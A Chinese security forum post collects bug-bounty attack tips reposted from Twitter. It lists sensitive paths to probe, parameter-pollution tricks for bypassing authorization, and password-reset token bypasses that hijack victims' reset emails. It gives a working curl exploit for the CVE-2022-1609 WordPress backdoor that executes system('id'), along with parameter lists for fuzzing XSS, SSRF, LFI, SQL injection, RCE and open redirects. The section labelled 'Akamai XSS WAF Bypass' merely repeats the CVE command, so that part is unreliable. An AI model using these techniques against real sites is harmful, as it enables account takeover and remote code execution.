安全矩阵

 找回密码
 立即注册
搜索
查看: 3177|回复: 0

干货 | Twitter渗透技巧搬运工(三)

[复制链接]

189

主题

191

帖子

903

积分

高级会员

Rank: 4

积分
903
发表于 2022-6-2 23:49:39 | 显示全部楼层 |阅读模式

原文链接:干货 | Twitter渗透技巧搬运工(三) (qq.com)

  1. /.git/HEAD
  2. /.git/logs/HEAD
  3. /.import/
  4. /.bashrc
  5. /admin-cgi
  6. /admin-console
  7. /backup/
  8. /console/
  9. /console/login
  10. /h2console
  11. /cgi-bin/admin.cgi
  12. /jmx-console/
  13. /portal/
  14. /portal/login
  15. /syslog/
  16. /web-console
复制代码
未授权漏洞挖掘tips

  1. {“id”:111}⟶ 401 Unauthorized
  2. {“id”:{“id”:111}} ⟶ 200 OK
  3. POST /api/get_profile
  4. Content-Type: application/json {“user_id”:<attacker_id>,”user_id”:<victim’s_id>}
  5. GET /api_v1/messages?user_id=VICTIM_ID ⟶ 401
  6. GET /api_v1/messages?user_id=VICTIM_ID ⟶ 401
  7. GET /api_v1/messages?user_id=attack&user_id=VICTIM ⟶ 200 OK
复制代码


Github黑客语法tips

  1. User:XXX First Name Last Name
  2. User:XXX Firstname Lastname
  3. User:XXX Full Name
  4. User:XXX Fullname
复制代码


密码重置挖洞Tips
  1. 1- Completely remove the token
  2. 2- change it to 00000000...
  3. 3- use null/nil value
  4. 4- try expired token
  5. 5- try an array of old tokens
  6. 6- look for race conditions
  7. 7- change 1 char at the begin/end to see if the token is evaluated
  8. 8- use unicode char jutzu to spoof email address
  9. 9- try victim@email.com&attacker@email.com use  %20 or | as separators
  10. 10- try to register the same mail with different TLD (.eu,.net etc)
  11. 11- don't add the domain locu@
  12. 12- try sqli bypass and wildcard or, %, *
  13. 13- request smuggler?
  14. 14 - change request method (get, put, post etc) and/or content type (xml<>json)
  15. 15- match bad response and replace with good one
  16. 16- use super long string
  17. 17-Send a massive token
  18. 18- Send null fields
  19. 19-Send a -*-*-*--""---*-*;*;*-*--*-*;*;*-*-*+;**;;*+*+*!*!*+*++*;*;*+*+*+*++*;
复制代码

翻译后

  1. 1-完全删除令牌
  2. 2-将其更改为00000000。。。
  3. 3-使用空/空值
  4. 4-试用过期令牌
  5. 5-尝试一组旧令牌
  6. 6-试试条件竞争
  7. 7-在开始/结束处更改1个字符,以查看是否对标记进行了评估
  8. 8-使用unicode字符juzi欺骗电子邮件地址
  9. 9-尝试victim@email.com&attacker@email.com使用%20或|作为分隔符
  10. 10-尝试用不同的TLD(.eu、.net等)注册同一邮件
  11. 11-不添加域@
  12. 12-尝试sqli旁路和通配符或,%*
  13. 13-请求走私者?
  14. 14-更改请求方法(get、put、post等)和/或内容类型(xml<>json)
  15. 15-匹配不良响应并替换为良好响应
  16. 16-使用超长字符串
  17. 17发送大量token
  18. 18-发送空字段
  19. 19发送-*-*-*-*-“”-*-*-*;*;*-*-*-*-*;*;*-*-*+;***;;*+*+*!*!*+*++*++*;*;*+*+*++*++*;
复制代码
来源:https://twitter.com/Omar_J_Ahmed/status/1530649092577173507?s=20&t=WC6ryJ-bM7QVkDzU71iusg
CVE-2022-1609 WordPress Weblizar Backdoor

  1. $ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'

  2. uid=33(www-data) gid=33(www-data) groups=33(www-data)
复制代码


  • 来源:
https://twitter.com/momika233/status/1529694086193508353?s=20&t=WC6ryJ-bM7QVkDzU71iusgAkamai XSS WAF Bypass

  1. $ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'

  2. uid=33(www-data) gid=33(www-data) groups=33(www-data)
复制代码




来源:
https://twitter.com/0x0SojalSec/ ... ryJ-bM7QVkDzU71iusg

下面的这些参数可用于工具挖掘漏洞或手动挖掘漏洞的常用参数,看到相关的参数可以往相关的漏洞去挖掘去fuzz验证。XSS漏洞常见参数

  1. ?q={payload}
  2. ?s={payload}
  3. ?search={payload}
  4. ?id={payload}
  5. ?lang={payload}
  6. ?keyword={payload}
  7. ?query={payload}
  8. ?page={payload}
  9. ?keywords={payload}
  10. ?year={payload}
  11. ?view={payload}
  12. ?email={payload}
  13. ?type={payload}
  14. ?name={payload}
  15. ?p={payload}
  16. ?month={payload}
  17. ?image={payload}
  18. ?list_type={payload}
  19. ?url={payload}
  20. ?terms={payload}
  21. ?categoryid={payload}
  22. ?key={payload}
  23. ?login={payload}
  24. ?begindate={payload}
  25. ?enddate={payload}
复制代码




SSRF漏洞常见参数

  1. ?dest={target}
  2. ?redirect={target}
  3. ?uri={target}
  4. ?path={target}
  5. ?continue={target}
  6. ?url={target}
  7. ?window={target}
  8. ?next={target}
  9. ?data={target}
  10. ?reference={target}
  11. ?site={target}
  12. ?html={target}
  13. ?val={target}
  14. ?validate={target}
  15. ?domain={target}
  16. ?callback={target}
  17. ?return={target}
  18. ?page={target}
  19. ?feed={target}
  20. ?host={target}
  21. ?port={target}
  22. ?to={target}
  23. ?out={target}
  24. ?view={target}
  25. ?dir={target}
复制代码


编辑
来源:https://twitter.com/NandanLohita ... ryJ-bM7QVkDzU71iusg
LFI本地文件包含漏洞常见参数

  1. ?cat={payload}
  2. ?dir={payload}
  3. ?action={payload}
  4. ?board={payload}
  5. ?date={payload}
  6. ?detail={payload}
  7. ?file={payload}
  8. ?download={payload}
  9. ?path={payload}
  10. ?folder={payload}
  11. ?prefix={payload}
  12. ?include={payload}
  13. ?page={payload}
  14. ?inc={payload}
  15. ?locate={payload}
  16. ?show={payload}
  17. ?doc={payload}
  18. ?site={payload}
  19. ?type={payload}
  20. ?view={payload}
  21. ?content={payload}
  22. ?document={payload}
  23. ?layout={payload}
  24. ?mod={payload}
  25. ?conf={payload}
复制代码

SQL注入漏洞常见参数

  1. ?id=
  2. ?page=
  3. ?dir=
  4. ?search=
  5. ?category=
  6. ?file=
  7. ?class=
  8. ?url=
  9. ?news=
  10. ?item=
  11. ?menu=
  12. ?lang=
  13. ?name=
  14. ?ref=
  15. ?title=
  16. ?view=
  17. ?topic=
  18. ?thread=
  19. ?type=
  20. ?date=
  21. ?form=
  22. ?join=
  23. ?main=
  24. ?nav=
  25. ?region=
复制代码

RCE远程代码常见参数


  1. ?cmd=
  2. ?exec=
  3. ?command=
  4. ?execute=
  5. ?ping=
  6. ?query=
  7. ?jump=
  8. ?code=
  9. ?reg=
  10. ?do=
  11. ?func=
  12. ?arg=
  13. ?option=
  14. ?load=
  15. ?process=
  16. ?step=
  17. ?read=
  18. ?function=
  19. ?req=
  20. ?feature=
  21. ?exe=
  22. ?module=
  23. ?payload=
  24. ?run=
  25. ?print=
复制代码


URL重定向漏洞常见参数
  1. ?next={payload}
  2. ?url={payload}
  3. ?target={payload}
  4. ?rurl={payload}
  5. ?dest={payload}
  6. ?destination={payload}
  7. ?redir={payload}
  8. ?redirect_uri={payload}
  9. ?redirect_url={payload}
  10. ?redirect={payload}
  11. /redirect/{payload}
  12. /cgi-bin/redirect.cgi?{payload}
  13. /out/{payload}
  14. /out?{payload}
  15. ?view={payload}
  16. /login?to={payload}
  17. ?image_url={payload}
  18. ?go={payload}
  19. ?return={payload}
  20. ?returnTo={payload}
  21. ?return_to={payload}
  22. ?checkout_url={payload}
  23. ?continue={payload}
  24. ?return_path={payload}
复制代码

来源:https://github.com/lutfumertceylan/top25-parameter邮件密码重置漏洞Tips在密码重置时尝试多封电子邮件,并检查您的两个电子邮件帐户是否有邮件

  1. ???? email=victim&email=attacker
  2. ???? email[]=victim&email[]=attacker
  3. ???? email=victim,attacker
  4. ???? {email: victim, email:attacker}
  5. ???? {email: [victim,attacker]}
复制代码

推荐阅读:https://github.com/vavkamil/awesome-bugbounty-tools

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 18:27 , Processed in 0.014104 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表